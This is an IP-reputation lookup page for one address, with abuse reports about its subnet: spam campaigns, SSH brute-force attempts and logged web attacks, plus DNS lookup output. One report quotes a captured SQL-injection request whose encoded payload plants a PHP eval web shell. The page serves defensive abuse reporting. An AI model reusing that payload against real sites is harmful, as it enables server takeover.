104.148.1.5 - IPInfo

Basic Info

City: unknown

Region: unknown

Country: United States of America (the)

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:

Make a comment on this IP

No discussion about this IP yet. Click above link to make one.

Comments on same subnet:

IP	Type	Details	Datetime
104.148.18.18	spamattack	PHISHING AND SPAM ATTACK GROUP USES LayerHost, IP SERVER LLC, Root Networks LLC, Serverion BV, XSServer GmbH, Xervers, Colocrossing 104.148.18.12 Uniswap Select - ivy-lavoi@outreachapps.club, New underground DeFi crypto - Want to get paid for holding crypto?, 7 Jul 2021 inetnum: 2.58.148.0 - 2.58.149.255 org-name: Serverion BV inetnum: 5.252.192.0 - 5.252.195.255 org-name: IP SERVER LLC NetRange: 23.247.0.0 - 23.247.127.255 OrgName: LayerHost NetRange: 31.210.22.0 - 31.210.23.255 org-name: Serverion BV NetRange: 103.73.156.0 - 103.73.156.255 OrgName: LayerHost NetRange: 104.148.0.0 - 104.148.127.255 OrgName: LayerHost NetRange: 104.223.128.0 - 104.223.255.255 OrgName: LayerHost NetRange: 107.179.0.0 - 107.179.127.255 OrgName: LayerHost NetRange: 134.73.0.0 - 134.73.255.255 CustName: Root Networks LLC NetRange: 157.52.128.0 - 157.52.255.255 OrgName: LayerHost NetRange: 185.239.242.0 - 185.239.242.255 org-name: Serverion BV inetnum: 194.59.216.0 - 194.59.217.255 org-name: Serverion BV inetnum: 195.62.32.0 - 195.62.33.255 org-name: XSServer GmbH inetnum: 195.133.12.0 - 195.133.15.255 netname: Xervers inetnum: 195.133.39.0 - 195.133.39.255 org-name: Serverion BV NetRange: 198.12.64.0 - 198.12.127.255 OrgName: ColoCrossing Some similar emails from same group 5.252.194.15 Plansforsheds - EasyShedPlans@ultraboostz.co, Discover The Easiest Way To Build Beautiful Sheds..., 15 Jun 2021 31.210.22.9 Fat belly - info@bloodpressure.buzz, Japanese “Fix” for Belly Fat?, 17 Jun 2021 31.210.22.106 On Hold - OnHold@ecobuds.us, Your FREE Red Laser Targeting System, 21 Jun 2021	2021-07-08 06:07:44
104.148.18.18	spamattack	PHISHING AND SPAM ATTACK GROUP USES LayerHost, IP SERVER LLC, Root Networks LLC, Serverion BV, XSServer GmbH, Xervers, Colocrossing 104.148.18.18 Bitcoin Select arianna.lavoi@boschbuy.club, Dividends Paid Every 60 Minutes - New underground DeFi crypto, 05 Jul 2021 2.58.148.71 Save on the Cost of Gas - Effuel@shofybox.us, This Simple Device Saves You 25% on Your Car's Fuel Consumption, Wed, 7 Jul inetnum: 2.58.148.0 - 2.58.149.255 org-name: Serverion BV inetnum: 5.252.192.0 - 5.252.195.255 org-name: IP SERVER LLC NetRange: 23.247.0.0 - 23.247.127.255 OrgName: LayerHost NetRange: 31.210.22.0 - 31.210.23.255 org-name: Serverion BV NetRange: 103.73.156.0 - 103.73.156.255 OrgName: LayerHost NetRange: 104.148.0.0 - 104.148.127.255 OrgName: LayerHost NetRange: 104.223.128.0 - 104.223.255.255 OrgName: LayerHost NetRange: 107.179.0.0 - 107.179.127.255 OrgName: LayerHost NetRange: 134.73.0.0 - 134.73.255.255 CustName: Root Networks LLC NetRange: 157.52.128.0 - 157.52.255.255 OrgName: LayerHost NetRange: 185.239.242.0 - 185.239.242.255 org-name: Serverion BV inetnum: 194.59.216.0 - 194.59.217.255 org-name: Serverion BV inetnum: 195.62.32.0 - 195.62.33.255 org-name: XSServer GmbH inetnum: 195.133.12.0 - 195.133.15.255 netname: Xervers inetnum: 195.133.39.0 - 195.133.39.255 org-name: Serverion BV NetRange: 198.12.64.0 - 198.12.127.255 OrgName: ColoCrossing Some similar emails from same group 5.252.194.15 Plansforsheds - EasyShedPlans@ultraboostz.co, Discover The Easiest Way To Build Beautiful Sheds..., 15 Jun 2021 31.210.22.9 Fat belly - info@bloodpressure.buzz, Japanese “Fix” for Belly Fat?, 17 Jun 2021 31.210.22.106 On Hold - OnHold@ecobuds.us, Your FREE Red Laser Targeting System, 21 Jun 2021	2021-07-08 06:03:02
104.148.12.219	spam	Borg202@889205.com	2020-09-28 16:06:42
104.148.125.224	attack	Invalid user martin from 104.148.125.224 port 59452	2020-09-25 00:39:30
104.148.125.224	attackbotsspam	Invalid user martin from 104.148.125.224 port 59452	2020-09-24 16:18:37
104.148.125.224	attackspambots	2020-09-23T22:02:17+0200 Failed SSH Authentication/Brute Force Attack.(Server 2)	2020-09-24 07:44:20
104.148.111.137	attackbots	Spam	2020-07-08 07:54:39
104.148.126.239	attackbotsspam	email spam	2019-12-19 21:33:23
104.148.105.5	attackspambots	$f2bV_matches	2019-11-21 03:09:12
104.148.105.84	attack	Nov 20 15:38:34 mxgate1 postfix/postscreen[8842]: CONNECT from [104.148.105.84]:52518 to [176.31.12.44]:25 Nov 20 15:38:34 mxgate1 postfix/dnsblog[8845]: addr 104.148.105.84 listed by domain zen.spamhaus.org as 127.0.0.3 Nov 20 15:38:34 mxgate1 postfix/dnsblog[8843]: addr 104.148.105.84 listed by domain b.barracudacentral.org as 127.0.0.2 Nov 20 15:38:40 mxgate1 postfix/postscreen[8842]: DNSBL rank 3 for [104.148.105.84]:52518 Nov x@x Nov 20 15:38:41 mxgate1 postfix/postscreen[8842]: DISCONNECT [104.148.105.84]:52518 ........ ----------------------------------------------- https://www.blocklist.de/en/view.html?ip=104.148.105.84	2019-11-21 01:58:02
104.148.119.2	attackspam	Autoban 104.148.119.2 AUTH/CONNECT	2019-11-18 17:29:32
104.148.105.5	attackbotsspam	SQL injection attempts.	2019-11-18 13:28:12
104.148.105.5	attack	Web app attack & sql injection attempts. Date: 2019 Nov 17. 18:11:58 Source IP: 104.148.105.5 Portion of the log(s): 104.148.105.5 - [17/Nov/2019:18:11:57 +0100] "POST /ysyqq.php HTTP/1.1" 404 548 "http://[removed].hu/ysyqq.php" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)" 104.148.105.5 - [17/Nov/2019:18:11:56 +0100] GET /user.php?act=login HTTP/1.1" 404 548 "45ea207d7a2b68c49582d2d22adf953aads\|a:2:{s:3:\x22num\x22;s:297:\x22/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A336C7A655846784C6E426F634363734A7A772F63476877494756325957776F4A46395154314E5557336C7A655630704F79412F506963702729293B2F2F7D787878,10-- -\x22;s:2:\x22id\x22;s:11:\x22-1' UNION/\x22;}45ea207d7a2b68c49582d2d22adf953a" 104.148.105.5 - [17/Nov/2019:18:11:56 +0100] POST /fqopr.php 104.148.105.5 - [17/Nov/2019:18:11:56 +0100] POST /fdgq.php 104.148.105.5 - [17/Nov/2019:18:11:56 +0100] GET /user.php?act=login ....	2019-11-18 05:01:17
104.148.105.98	attackspam	SASL Brute Force	2019-11-15 21:03:28
104.148.105.5	attackbotsspam	php POST attempts	2019-11-15 15:28:35

Whois info:

Dig info:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 104.148.1.5
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 31419
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;104.148.1.5.			IN	A

;; AUTHORITY SECTION:
.			30	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2025022800 1800 900 604800 86400

;; Query time: 17 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Fri Feb 28 15:41:50 CST 2025
;; MSG SIZE  rcvd: 104

Host info

b'Host 5.1.148.104.in-addr.arpa not found: 2(SERVFAIL)
'

Nslookup info:

server can't find 104.148.1.5.in-addr.arpa: SERVFAIL

Related IP info:

Related comments:

IP	Type	Details	Datetime
78.128.113.132	attackspambots	2020-02-05 09:34:07 server smtpd[99630]: warning: unknown[78.128.113.132]:7960: SASL CRAM-MD5 authentication failed: PDQzNTMxMjY2NDMxNjU0NjEuMTU4MDkyNDA0NUBzY2FsbG9wLmxvY2FsPg==	2020-02-06 03:04:26
80.82.70.33	attackbotsspam	Feb 5 19:31:09 debian-2gb-nbg1-2 kernel: \[3186715.730276\] \[UFW BLOCK\] IN=eth0 OUT= MAC=96:00:00:0e:18:f4:d2:74:7f:6e:37:e3:08:00 SRC=80.82.70.33 DST=195.201.40.59 LEN=40 TOS=0x00 PREC=0x00 TTL=247 ID=1882 PROTO=TCP SPT=55767 DPT=23599 WINDOW=1024 RES=0x00 SYN URGP=0	2020-02-06 02:46:55
139.199.172.82	attack	Unauthorized connection attempt detected from IP address 139.199.172.82 to port 80 [J]	2020-02-06 03:09:18
220.156.169.192	attackspambots	Brute force attempt	2020-02-06 02:54:19
51.89.149.213	attack	Unauthorized connection attempt detected from IP address 51.89.149.213 to port 2220 [J]	2020-02-06 03:07:48
123.126.82.7	attackbots	Feb 3 02:58:09 nbi10516-7 sshd[6388]: Invalid user server from 123.126.82.7 port 8981 Feb 3 02:58:12 nbi10516-7 sshd[6388]: Failed password for invalid user server from 123.126.82.7 port 8981 ssh2 Feb 3 02:58:12 nbi10516-7 sshd[6388]: Received disconnect from 123.126.82.7 port 8981:11: Bye Bye [preauth] Feb 3 02:58:12 nbi10516-7 sshd[6388]: Disconnected from 123.126.82.7 port 8981 [preauth] Feb 3 03:01:14 nbi10516-7 sshd[12851]: Invalid user admin from 123.126.82.7 port 8983 Feb 3 03:01:16 nbi10516-7 sshd[12851]: Failed password for invalid user admin from 123.126.82.7 port 8983 ssh2 Feb 3 03:01:16 nbi10516-7 sshd[12851]: Received disconnect from 123.126.82.7 port 8983:11: Bye Bye [preauth] Feb 3 03:01:16 nbi10516-7 sshd[12851]: Disconnected from 123.126.82.7 port 8983 [preauth] Feb 3 03:02:25 nbi10516-7 sshd[25430]: Invalid user postmaster from 123.126.82.7 port 8984 Feb 3 03:02:27 nbi10516-7 sshd[25430]: Failed password for invalid user postmaster from 123.1........ -------------------------------	2020-02-06 02:43:00
118.201.195.226	attack	Unauthorised access (Feb 5) SRC=118.201.195.226 LEN=40 TTL=49 ID=21965 TCP DPT=8080 WINDOW=5835 SYN Unauthorised access (Feb 3) SRC=118.201.195.226 LEN=40 TTL=48 ID=59320 TCP DPT=8080 WINDOW=5835 SYN	2020-02-06 02:44:21
169.255.136.14	attack	IP was detected trying to Brute-Force SSH, FTP, Web Apps, Port-Scan or Hacking.	2020-02-06 02:55:27
36.65.60.201	attackbots	1580910320 - 02/05/2020 14:45:20 Host: 36.65.60.201/36.65.60.201 Port: 445 TCP Blocked	2020-02-06 02:39:15
178.216.100.12	attackbotsspam	Unauthorized connection attempt from IP address 178.216.100.12 on Port 445(SMB)	2020-02-06 02:57:15
193.70.43.220	attack	Feb 5 08:26:59 hpm sshd\[16218\]: Invalid user wn from 193.70.43.220 Feb 5 08:26:59 hpm sshd\[16218\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=220.ip-193-70-43.eu Feb 5 08:27:01 hpm sshd\[16218\]: Failed password for invalid user wn from 193.70.43.220 port 36518 ssh2 Feb 5 08:30:04 hpm sshd\[16517\]: Invalid user salvini from 193.70.43.220 Feb 5 08:30:04 hpm sshd\[16517\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=220.ip-193-70-43.eu	2020-02-06 02:38:09
196.179.246.54	attackbotsspam	Unauthorized connection attempt from IP address 196.179.246.54 on Port 445(SMB)	2020-02-06 02:53:01
104.215.193.68	attack	Auto reported by IDS	2020-02-06 03:09:51
59.92.179.18	attackbots	Unauthorized connection attempt from IP address 59.92.179.18 on Port 445(SMB)	2020-02-06 02:47:25
134.209.90.139	attack	Unauthorized connection attempt detected from IP address 134.209.90.139 to port 2220 [J]	2020-02-06 03:08:34

Recently Reported IPs

32.70.181.119	126.77.250.79	202.88.141.0	23.102.240.124
253.75.170.152	49.29.110.225	136.150.51.144	206.183.236.199
113.150.116.52	211.162.239.208	141.120.242.20	239.31.74.89
90.126.99.95	82.96.235.85	206.8.211.219	85.200.203.184
17.77.153.218	247.131.22.117	8.103.37.153	76.239.209.101